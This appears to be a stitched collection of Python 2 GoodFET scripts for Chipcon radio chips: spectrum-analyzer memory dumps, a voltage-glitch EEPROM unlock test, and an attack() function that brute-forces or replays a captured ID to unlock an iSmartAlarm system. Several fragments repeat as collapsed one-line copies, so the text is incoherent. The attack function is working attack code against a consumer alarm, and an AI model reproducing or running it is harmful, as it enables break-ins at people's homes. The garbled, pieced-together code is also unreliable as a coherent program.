# Layout of the buffer this script reads, as drawn by the author:
# ------------------------------------------------------------------------------
# | Marker | MSB Loop | LSB Loop | channel | channel | ... | channel | channel |
# | 0xFE   | Count    | Count    | number  | rssi    | ... | number  | rssi    |
# ------------------------------------------------------------------------------

import sys
import time

import Gnuplot as plt

# Hard-coded developer checkouts; point this at the local GoodFET client
# directory.  Whatever GoodFETCC.py is found there is executed on import, so
# the directory should not be writable by other users.
# sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
sys.path.append('/home/cutaway/Hardware/Goodfet/trunk/client/')
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex  # not used in this excerpt

# Open the serial link to the GoodFET and start a session with the target.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# Halt, then release, the target CPU and give it a second before reading.
# NOTE(review): presumably this clears a stuck debug state - confirm.
client.CChaltcpu()
client.CCreleasecpu()
time.sleep(1)

# presumably the target data address of the buffer drawn above - TODO confirm
chanstart = 0xf000
#maxchan=132;
maxchan = 53
# NOTE: shadows the builtin round(); the name is kept because code after this
# excerpt may read it.
round = 0

# Plot handle; the code that feeds it is not part of this excerpt.
g = plt.Gnuplot()
# GoodFET Chipcon Example
#
# (C) 2009 Travis Goodspeed <travis at radiantmachines.com>
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.

import sys
import time

# Hard-coded developer checkout; adjust to the local GoodFET client directory.
# Code imported from this directory runs with this script's privileges.
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex  # not used in this excerpt

# Open the serial link to the GoodFET and start a session with the target.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# 8 * 132 = 1056 bytes are read per pass, starting at data address 0xf000.
bytescount = 8 * 132
bytestart = 0xf000

while True:
    # One pass per second: halt the target CPU, then peek its data memory one
    # byte at a time and collect the values as space-separated hex.
    time.sleep(1)
    client.CChaltcpu()
    dump = ""
    for foo in range(bytescount):
        dump += " %02x" % (client.CCpeekdatabyte(bytestart + foo),)
    # NOTE(review): the listing ends here; what is done with `dump`, and
    # whether the CPU is released again, is not shown.
# GoodFET Chipcon Example # # (C) 2009 Travis Goodspeed <travis at radiantmachines.com> # # This code dumps the spectrum analyzer data from Mike Ossmann's # spectrum analyzer firmware. import sys sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC from intelhex import IntelHex16bit, IntelHex import time client = GoodFETCC() client.serInit() client.setup() client.start() client.CChaltcpu() client.CCreleasecpu() time.sleep(1) bytestart = 0xf800 maxchan = 132 round = 0 print "time freq rssi"
import time

# Hard-coded developer checkouts; point this at the local GoodFET client
# directory.  Whatever GoodFETCC.py is found there is executed on import, so
# the directory should not be writable by other users.
# (`sys` is imported above this excerpt.)
# sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
sys.path.append('/home/cutaway/Hardware/Goodfet/trunk/client/')
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex  # not used in this excerpt

# Sleep intervals, all in seconds.
sshsi = 1      # one second
shsi = 10      # 10 seconds
mdsi = 60      # 1 minute
lgsi = 120     # 2 minutes
xlgsi = 1200   # 20 minutes

# Open the serial link to the GoodFET and start a session with the target.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# Halt and release the CPU once, in case an earlier run left it in a bad
# state (the author's stated reason).
client.CChaltcpu()
client.CCreleasecpu()

# Channel number -> approximate frequency in MHz, in 0.5 MHz steps:
# channel 0 is 902.0 and channel 52 is 928.0.
max_chan = 53  # 53 entries because channel 0 is included
chan_dict = dict([(x, 902 + x * .5) for x in range(max_chan)])
# GoodFET Chipcon Example
#
# (C) 2009 Travis Goodspeed <travis at radiantmachines.com>
#
# This code is being rewritten and refactored.  You've been warned!

import sys
import binascii

# Hard-coded developer checkout; adjust to the local GoodFET client directory.
# Code imported from this directory runs with this script's privileges.
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex  # not used in this excerpt

# Open the serial link to the GoodFET and start a session with the target.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# Counters and read window consumed by code after this excerpt.
# NOTE(review): 64 bytes starting at 0x0C is how the names read; which memory
# space the address refers to is not shown here - confirm.
bytecount = 0
lastcount = 0
bytescount = 64
bytestart = 0x0C
# NOTE: `bytes` and `file` shadow builtins; the names are kept because code
# after this excerpt may read them.
bytes = []

# Output path is fixed; the command-line variant is left commented out.
f = "random.bin"  #sys.argv[1];
# Mode 'wb' truncates any existing random.bin in the working directory.
# The handle is not closed within this excerpt.
file = open(f, mode='wb')
def attack(attack_type):
    """Reflash the attached Chipcon target with an ID record and trigger it.

    Opens a GoodFET session and a 9600-baud serial link on ``args.port``,
    then branches on *attack_type* (a one-character string):

    * ``'0'`` -- overwrites bytes 13-14 of a fixed 16-byte ID with each
      counter value from 1 to 65535, flashing and triggering once per value.
    * ``'2'`` -- builds the ID from the module-level ``src_id``, waits for
      ENTER, then flashes and triggers once.
    * anything else -- same as ``'2'`` but sleeps ``args.delay`` seconds
      instead of prompting.

    Every path, including the ``except`` handler, ends in ``exit_clean()``;
    nothing is returned.

    Depends on names defined elsewhere in the file and not visible here:
    ``args``, ``src_id``, ``serial``, ``GoodFETCC``, ``StringIO``,
    ``unhexlify``, ``sleep``, ``offset``, ``data``, ``serialpoke``,
    ``clearscreen``, ``exit_clean`` and the colour helpers.
    """
    try:
        global ser
        global args
        # Value handed to serialpoke() after each flash; presumably the byte
        # written to the Arduino over `ser` - confirm against serialpoke().
        byte = '1'
        # Initialize GoodFET serial port connection
        client = GoodFETCC()
        client.serInit()
        # Connect to GoodFET
        client.setup()
        # start() is issued four times; the author attributes this to poor
        # JTAG latching.
        client.start()
        client.start()
        client.start()
        client.start()
        # Open serial pipe to Arduino.  timeout=0 makes reads non-blocking.
        ser = serial.Serial(args.port, 9600, timeout=0)
        if attack_type == '0':
            clearscreen()
            # 16-byte template; only bytes 13-14 are changed by the loop below.
            # NOTE: `id` and `bytes` shadow builtins inside this function.
            id = 'FFFFFFFFFFFFFF0000000000070000FF'
            bytes = bytearray.fromhex(id)
            counter = 0  # 38520 (value left by the author; meaning not shown)
            # NOTE(review): the varied field is 16 bits wide and nothing here
            # reacts to rejected attempts, so the approach presumably depends
            # on a receiver with no sender authentication or attempt
            # throttling - inferred, not shown in this code.
            while True:
                if counter == 65535:
                    break
                counter += 1
                bytes[13:15] = unhexlify(offset(counter))
                # data() presumably renders an Intel HEX data record for
                # address 32752 (0x7FF0); ':00000001FF' is the standard Intel
                # HEX end-of-file record.
                f = StringIO(data(32752, bytes) + '\n:00000001FF')
                print pink("IHEX:\n" + f.getvalue() + '\n')
                client.flash(f)
                f.close()
                # Stop the debug session, wait, poke the Arduino, wait again,
                # then restart the session for the next value.  The sleeps
                # are fixed; their rationale is not documented.
                client.stop()
                sleep(2.5)
                serialpoke(byte)
                sleep(0.6)
                client.start()
            print green(
                "[SUCCESS] All 65536 ID's have been exhausted, good day.")
            exit_clean()
        else:
            global src_id
            print green(
                "[SUCCESS] Source ID captured from iSmartAlarm remote or sensor, attempting unlock...\n"
            )
            # NOTE(review): this path re-sends an ID taken from an earlier
            # capture; presumably it works only where the receiver accepts a
            # static ID without a rolling code or challenge - confirm.
            # src_id is assumed to be hex text that brings the total to 16
            # bytes - verify against where src_id is set.
            id = 'FFFFFFFFFFFFFF00000000' + src_id + 'FF'
            bytes = bytearray.fromhex(id)
            if attack_type == '2':
                # Manual mode: block until the operator presses ENTER.
                raw_input('Press [ENTER] when ready to unlock:')
            else:
                print yellowbold(
                    "[INFO] Delay mode enabled. Waiting %i seconds till unlock"
                    % args.delay)
                sleep(args.delay)
            # Same record layout as the loop above, flashed once.
            f = StringIO(data(32752, bytes) + '\n:00000001FF')
            print pink("IHEX:\n" + f.getvalue() + '\n')
            client.flash(f)
            f.close()
            client.stop()
            sleep(2.5)
            serialpoke(byte)
            sleep(0.6)
            # The message is optimistic: nothing here checks the outcome.
            print green("[SUCCESS] Hopefully unlocked :D")
            exit_clean()
    except Exception, e:
        # Python 2 except syntax.  Any failure in setup, flashing or serial
        # I/O is reported under the same "flashing" message.
        print red("\n[ERROR] An error occured while flashing ID's\n\t%s" % e)
        exit_clean()
# # This code dumps the spectrum analyzer data from Mike Ossmann's # spectrum analyzer firmware. # # # import sys sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC from intelhex import IntelHex16bit, IntelHex import time client = GoodFETCC() client.serInit() client.setup() client.start() client.CChaltcpu() client.CCreleasecpu() time.sleep(1) bytestart = 0xf000 bytescount = 8 * 132 maxchan = 132 round = 0 print "time freq rssi rssimax"
import sys
import binascii
import time
import random
import sqlite3

# The relative entry is resolved against the current working directory, not
# this file's location, so which GoodFETCC.py gets imported (and executed)
# depends on where the script is launched from.
sys.path.append('../../../trunk/client/')
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex  # not used in this excerpt

# Results store: glitch.db in the working directory, with one untyped table
# created on first run.  The SQL is a constant string with no interpolation.
db = sqlite3.connect("glitch.db")
db.execute("create table if not exists glitches(time,vcc,gnd,trials,glitchcount,count)")

# Open the serial link to the GoodFET.  The original comment also mentions
# setting the baud rate; no such call appears in this excerpt.
client = GoodFETCC()
client.serInit()

print "-- GoodFET EEPROM Unlock test."
print "-- Count of reads with voltage glitch."

# Start a session and erase the attached target for a baseline.
# NOTE(review): erase() presumably wipes the chip's flash, so whatever was
# programmed on the attached part is lost - confirm.
client.start()
client.erase()

# Byte value expected at code address 0 once the target has been prepared.
secret = 0x69

# Repeat until code byte 0 reads back as `secret`.
# NOTE(review): nothing visible in this loop writes `secret`; the listing
# appears to end before the rest of the loop body.
while client.CCpeekcodebyte(0) != secret:
    print "-- Setting secret"
    client.start()
# # This code dumps the spectrum analyzer data from Mike Ossmann's # spectrum analyzer firmware. # # # import sys; sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC; from intelhex import IntelHex16bit, IntelHex; import time; client=GoodFETCC(); client.serInit(); client.setup(); client.start(); client.CChaltcpu(); client.CCreleasecpu(); time.sleep(1); bytestart=0xf000; bytescount=8*132 maxchan=132; round=0; print "time freq rssi rssimax";